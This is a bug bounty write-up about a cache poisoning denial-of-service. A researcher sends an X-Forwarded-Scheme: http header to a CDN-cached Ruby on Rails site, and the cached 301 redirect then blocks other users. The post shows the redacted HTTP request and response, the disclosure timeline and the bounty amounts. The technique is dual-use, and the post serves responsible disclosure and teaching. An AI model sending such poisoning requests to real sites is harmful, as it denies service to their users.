InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties…

Follow publication

How I Made $16,500 Hacking CDN Caching Servers — Part 3

bombon
InfoSec Write-ups
Published in
2 min readJan 29, 2022

Cache Poisoning DoS Via X-Forwarded-Scheme Header

Bounty: 3,000

I didn’t know this was a thing, until i saw @iustinBB ’s a blog about their research on Cache Poisoning Cache Poisoning at Scale

Sending the x-forwarded-scheme: http header would result  into a 301 redirect to the same location. If the response was cached by a CDN, it would cause a redirect loop, inherently denying access to the  file.

I quickly remembered a Private Program’s asset that was using caching servers and using Ruby on Rails

Request:

GET /?xxx HTTP/2 
Host: Redacted
X-Forwarded-Scheme: http
...

If you will test this, you should always use “cache busters” (?anything=x) in this case, i used (?xxx) so i don’t mistakenly poisoned other users.

Response:

HTTP/2 301 Moved Permanently 
Date: Wed, 19 Jan 2022 17:16:13 GMT
Content-Type: text/html
Location: Redacted
Via: 1.1 vegur
Cf-Cache-Status: HIT
Age: 3

If an attacker timed the cache server and poison https://redacted/

The user’s response when requesting https://redacted/ will be

HTTP/2 301 Moved Permanently
Cf-Cache-Status: HIT

They won’t be able to access https://redacted/ as the attacker saved the 301 redirect and would not load, until the cache refreshes.

Timeline:

Reported → January 19, 2022

Pending Program Review → January 25, 2022

Triaged → January 25, 2022

Bounty Awarded → January 26, 2022

The total $ for these 3 Reports was $11,300

I chose only these 3 reports because they were the most awarded ones.

I applied the same methodology on other programs, this includes Cache Deception issues like #1343086

Making a total of $15,400 on HackerOne and $1,100 on BugCrowd

Thanks for Reading!

Make sure to follow me on Twitter ;)

@bxmbn

🔈 🔈 Infosec Writeups is organizing its first-ever virtual conference and networking event. If you’re into Infosec, this is the coolest place to be, with 16 incredible speakers and 10+ hours of power-packed discussion sessions. Check more details and register here.

Published in InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Responses (3)

Write a response

Hello bro, may I ask if how did you identified that the website is using caching servers?

--

Hi.i enjoyed to read this write up.
I have a question:
I don't understand what means
“cache busters” (?anything=x).
I search the google and tell cachbusters set the cookie.
Is that correct?...

--

Wow, this was helpful a lot
I found the following responses on a target
Cf-Cache-Status: HIT
Does it mean that's vulnerable to cache poisoning?

--